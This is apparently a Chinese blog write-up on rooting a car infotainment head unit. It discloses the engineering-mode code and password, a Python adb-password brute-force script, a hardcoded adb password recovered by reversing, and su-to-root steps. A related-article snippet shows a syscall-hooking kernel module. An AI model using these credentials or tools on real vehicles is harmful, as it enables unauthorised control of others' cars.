Hacked某安汽车车机系统

最新推荐文章于 2024-02-22 13:52:14 发布
最新推荐文章于 2024-02-22 13:52:14 发布
阅读量3.5k 收藏 18
点赞数 2
文章标签: 车机安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/130217256
版权
本文介绍了作者如何通过收集信息进入某安汽车车机系统的工程模式,使用暴力破解方法尝试获取密码,并通过绿盟科技的博客得到启发,最终成功获取root权限。过程中涉及adbshell的使用、开发者模式的开启以及Python脚本的编写和IDA逆向分析。
摘要由CSDN通过智能技术生成

        很久之前尝试对某安汽车的车机系统进行渗透测试,但是却卡在入口无法进入,尝试暴力破解但是字典不够强大,没能成功。前段时间看到了绿盟科技博客的《新型车机,如何攻防?》感觉有点熟悉,再次探索发现可以获得车机系统root权限,遂事后诸葛亮一波,就当是学习笔记了。

        通过在论坛、QQ群、贴吧收集到这款车型进入工程模式的方法,在拨号键盘输入*#*#888,然后点击拨号,如图:

        进入密码认证界面,输入收集到的密码:369875,如图:

        此时进入工程模式,可以看到工程模式的功能,如图:

        点击“USB切换”可以将中控台下边的USB口切换为adb模式,从而通过数据线连接车机系统adb shell。可能我们需要启动USB调试,首先点击“打开系统设置原始界面 ——> Settings”,如图:

        此时进入系统设置界面,可以看到下边有“关于智能平台”,如图:

         点击“关于智能平台”后可以看到Android 版本、硬件型号版本号等等信息,如图:

        连续点击7次版本号后开启开发者模式,然后开启USB调试,如图:

         在连接adb shell时提示需要输入密码,如图:

        当时卡在这里很久,编写Python脚本使用字典爆破了很久也没成功,Python3脚本如下:


import pexpect
import random
import sys
# Open the password dictionary file

if len(sys.argv) < 2:
    print("Usage: python3",sys.argv[0],"password.txt")
    exit(0)
else:
    print("ADB Shell Brute         --By Infiltrator")
    with open(sys.argv[1]) as f:
        passwords = f.readlines()
    adb = pexpect.spawnu("adb shell",timeout=1)
    #adb.logfile_read = sys.stdout
    # Try each password in the dictionary file
    for password in passwords:
        password = password.strip()  # Remove leading/trailing whitespace
        # Wait for the password prompt
        try:
            s = adb.expect("password:")
        except:
            print("[!] Please check adb if connected!")
            exit(1)
        # Enter the password
        print("\r[*] Testing password:",password,end='')
        adb.sendline(password)
        # Wait for the output and check if we successfully logged in
        s = adb.expect(["verify success!", "verify failed!"])
        if s == 0:
            # Login succeeded, we're done
            print("\n[+] Success! Password is:", password)
            break
        else:
            # Login failed, try the next password
            continue

         直到看到新型车机,如何攻防?,文中逆向分析获得的密码立即让我觉得很是熟悉,如图:

        我直接使用该密码就可以成功登录adb shell,同时把密码加入字典后也可以破解出来,说明脚本没问题:

         并且直接执行su命令就获得root权限,如图:

        虽然限制策略不严格但是,adb push和adb install都无法安装app,暂时就先不管这些了,先复现一下硬编码漏洞吧。

        普通权限的adb pull命令基本获取不到什么有用的信息,执行adb root切换为root权限的adb,然后在使用adb pull将车机系统的文件系统下载到本地,如图:

        由于下载的文件太多,等了几分钟也没下载完,然后就直接下载system目录了,如图: 

        在system/bin目录下发现adbd程序,如图:

        使用IDA逆向分析,通过搜索password字符串定位程序输入,然而根本找不到password这个字符串,查看所有字符串可以发现程序调用了/system/bin/verify_sh,如图:

        使用IDA分析verify_sh,同样直接搜索password字符串定位输入,然后跳转到代码上下文发现内存中Base64编码的内容:

        解码之后为8769b3ad,应该是小端序的原因,将原本的adb36987在内存中存储为8769b3ad,如图:

 

江左盟宗主
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
nakamichi车机中控屏密码破解(开发者选项密码、usb主从模式切换密码)
cczhengv
05-04 1万+
默认密码 SystemProperties.get(“ro.sys.developer”, “”);成功打开开发者选项后,你会发现就算启用调试模式,设备也连接不上 adb。,输入以后会有很多隐藏菜单,找到usb子菜单,点进去并没有切换模式菜单。设备上有个载设置app,点进去底部最右边有个菜单点击又得输入密码。动态密码格式为 (当前年份-1000) + (当前日期+10)这个界面对应很多密码,不同的密码会跳转不同的页面。这个默认密码这台设备并没有配置,而是动态的。版本 Android11。
安卓导航车机root方法_手机、平板这么好用,为什么车机还这么垃圾
weixin_39993454的博客
11-19 5431
备胎说400万友关注。每天60秒,轻松懂汽车。 今天是备胎陪伴你的第 2078 天下方新增视频版,暂停、快进、倒退都没问题(和语音内容相同,选一个就行),继续往下拉还有文字版,和更多精彩评论以下是文字版汽车越来越智能化了,屏幕也越来越大了,有点像是带了4个轮子的“电脑”了。但是因为各种因素的影响,手机、平板早就用上所谓的“独立显卡”等等各种东西,越来越好用...
吉利缤越车机破解安装安卓软件(2021、2022铂金版、钻石版)
最新发布
qq_27076243的博客
02-22 3861
吉利缤越车机刷机安装第三方应用
汽车网络安全渗透测试概述
king110108的专栏
01-25 642
本文讲述信息安全的法规和GB,以及网络安全威胁分析及渗透测试的概述
智能网联汽车网络安全测试:渗透测试,模糊测试详细讲解
2301_76563067的博客
01-08 2929
一旦在模糊测试中捕获到异常状态,则记录导致异常状态的输入向量,该异常向量可能导致潜在的网络安全漏洞,异常状态是否可以被利用则需要进一步深入验证。计算层则为人、、环境的协调控制与管理提供计算保障,基于海量数据的分析结果协调联网中数量庞大的实体之间的信息交互,为上层应用奠定基础,大大提高交通效率、行安全性与交通系统稳定性。在漏洞挖掘领域,与渗透测试技术相伴使用的是模糊测试技术,广泛应用于智能网联汽车的不同载系统,发掘潜在的未知网络安全漏洞。模糊测试的目的在于观察输入向量是否引发 SUT的异常响应。
安卓导航车机root方法_上手飞歌X2 你会知道什么是真正的智能车机
weixin_39823200的博客
12-12 5505
​只懂最近接触了多款不同品牌的新品车机,发现今年各大车机厂商将主攻音响皇帝位、QLED屏、360全景等几大功能,但能让小编记住的目前只有飞歌X2,因为它相比其他品牌型号,在各新功能上进行了不同程度的提升,使用上更智能化、人性化,今天就带你领略一番。豪华的包装给小编不小惊喜飞歌X2上后开机画面不是人人都叫“皇帝位”刚刚提到过,其他品牌今年也有推出音响“皇帝位”这种体验升级功能,但大部分都是点击选...
一键获取Root
12-10
一键获取Root
Simulation-of-hacked-servers.rar_系统/网络安全_C++_Builder_
08-11
一种模拟攻击网络服务器,攻击网络防火墙的软件测试方案。
Forex Hacked 2.5 edu.rar_Forex Hacked_Forex-Hacked_Forex-Hacked-
07-14
"Forex Hacked"可能是一款专门用于外汇市场的自动交易系统或者EA(Expert Advisor),旨在通过算法交易帮助用户在外汇市场中获利。"edu"通常代表教育相关,暗示这个版本包含了教程或指导材料,适合初学者或者想要...
hacked_hogwarts
02-25
hacked_hogwarts
Mt3561系列安卓导航root&recovery.zip
07-28
准备工作   1、安装 SP_Flash_Tool,MTK 驱动.(掌讯方案MTK3561大屏导航ROOT固件:http://www.gpsmap.cc/caryindao/2488.html)。   2、准备好线刷版固件,以及自制 Recovery.img ,使用自制 Recovery.img 替换掉线刷版固件中的 Recovery.img 。   3、U 盘一个,格式化为 fat32 格式,在根目录放置 OTA 升级固件 xxx_evb3561sv_ct_66_m0-ota-xxx.zip ,以及 ROOT.zip 。 Recovery 安装   1、车机断电,从车机后侧的 microusb 口(非普通 usb 口)接电脑。   2、电脑会检测到 mtk preloader usb vcom,自动安装驱动,驱动安装完成后从电脑拔开 usb。   3、打开 SP_Flash_Tool,选择 scatter-loading file 为固件文件夹中的 mt3561T_Android_scatter.txt 。   4、仅勾选 Recovery,然后点击 download 开始刷机。   5、插入 usb,正常的话会开始刷入,底部横条走动。   6、刷机完毕拔开 usb,启动车机。 Root 安装   1、插入 u 盘将 ROOT.zip 复制到车机内置 sd 卡下。   2、在车机设置-导航设置中选择 Android 升级。   或者在导航中选择电话,输入*#*#5678#后会跳出设置。点击其他标签后选择 device 模式,此时导航可在电脑中识别为 adb 设备,使用 abd 程序 adb reboot recovery 即可。   3、车机重启后,将进入我们自制的 recovery。不成功的话可以多尝试几次。   4、进入 install,选择 sdcard 下的 ROOT.zip 进行安装。   5、安装完毕重启机器,Root 安装完毕。
安卓ROOT工具-几乎可以ROOT所有android手机
04-01
万能ANDROID系统ROOT工具,几乎可以ROOT所有ANDROID手机!
Forex_Hacked_Pro_Only_Forex_Hacked_Pro_ForexHacked_pro_
09-29
Forex_Hacked_Pro Expert Adviser for Meta Trader 4
N501VWUnlocked_rom_windows_hacked_BIOS_UNLOCKED_
10-03
标签中的"rom windows hacked BIOS UNLOCKED"进一步强调了这个文件的主要特性:它是ROM,适用于Windows操作系统,并且是一个经过黑客技术解锁的BIOS。 在压缩包子文件的文件名称列表中,我们看到的"N501VWUnlocked....
如何永久性开启adb 的root权限
欢迎加入Android老司机学院 482266514(技术交流群)密码CSDN
05-29 3862
[Description] 如何永久性开启adb 的root权限   [Keyword] user debug root adb adbd   [Solution] * adb 的root 权限是在system/core/adb/adb.c 中控制。主要根据ro.secure 以及 ro.debuggable 等system property 来控制。 默认即档ro.secure
安卓导航车机root方法_车机测试 | 测试比亚迪e1车机系统
weixin_39603217的博客
12-11 5684
此前,买网(Buycar.cn)已经测试过比亚迪宋EV500的车机系统,它流畅的操作以及精准的导航等给笔者留下了很深的印象。随着新能源越来越普及,比亚迪的这套DiLink智能联网系统也被应用到了更多的产品中,像比亚迪最新纯电e平台下的首款纯电e1的,其高配型同样搭载了DiLink系统,此前我们已经完成了对它的试驾,而车机也是每天用会长时间接触的部分,它的表现相比老大哥如何?我们一同来看...
使用拷贝的方式(adb push) 绕过Android系统和adb install 直接安装APK
a462533587的博客
03-21 9823
某些情况下定制的Android系统为了限制用户安装应用,例如电视盒子,载中控等,通过修改代码屏蔽了正常安装应用的方式 本文探讨如何在 adb shell 具有读写data分区目录的权限前提下,通过adb push 拷贝方式绕过Android系统和adb install直接安装apk到Android系统,适用于对Android系统和adb指令操作有一定基础的读者 测试环境:夜神模拟器(...
关于长安车机飞鱼系统解除系统安装限制以及过程
qq_40880973的博客
05-17 9915
文章原作者:@17710,因作者无吾爱账号,所以代为发表。已经获得作者授权!以下内容为作者原内容!此教程仅针对飞鱼系统代表型UNI-V 锐程puls 等 至于梧桐系统(代表型 UNI-T) 请见文章结尾思路(本人是纯小白 可能走了很多弯路 大佬勿喷)
U-BOOT学习之2014.4版Uboot启动流程分析
陈子陌的博客
12-31 676
一、前言 老大给我布置了一个任务:某某项目uboot开发之usb增强ic驱动。 不知道大家看到这个任务懵不懵,反正我最开始是蒙的。后来又问了一下,才明白到底要做啥。 任务是这样的:因为这个项目的usb线比较长,为了避免usb升级的时候读取u盘失败,所以我们采取的方案是硬件提供一个有i2c支持的usb增强ic。因此,我就需要在车机界面点击升级,车机重启进入uboot启动流程的时候去调用我写的驱动去初始化这个i2c,以此保证usb能正常读取到u盘内容,完成升级。 所以,学习uboot的启动流程就很有必要
Linux拦截系统调用
09-15
系统调用拦截是通过将系统要执行的系统调用替换为自己编写的内核函数来实现的。在Linux系统中,系统调用一般使用int 0x80指令(x86)或者syscall指令(x64)来调用。利用Linux内核模块可以实现系统调用的拦截。下面给出一个简单的例子来说明其基本的工作过程: ```c #define MODULE #define __KERNEL__ #include <linux/module.h> #include <linux/kernel.h> #include <asm/unistd.h> #include <sys/syscall.h> #include <linux/types.h> #include <linux/dirent.h> #include <linux/string.h> #include <linux/fs.h> #include <linux/malloc.h> extern void* sys_call_table[]; /*sys_call_table is exported, so we can access it*/ int (*orig_mkdir)(const char *path); /*the original system call*/ int hacked_mkdir(const char *path) { return 0; /*everything is ok, but the new system call does nothing*/ } int init_module(void) /*module setup*/ { orig_mkdir = sys_call_table[SYS_mkdir]; sys_call_table[SYS_mkdir] = hacked_mkdir; return 0; } void cleanup_module(void) /*module shutdown*/ { sys_call_table[SYS_mkdir] = orig_mkdir; /*set mkdir syscall to the original one*/ } ``` 在以上代码中,我们通过访问导出的`sys_call_table`变量来获取系统调用表,并将`mkdir`系统调用替换为自己编写的`hacked_mkdir`函数。在`hacked_mkdir`函数中,我们可以根据需求对系统调用进行修改。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值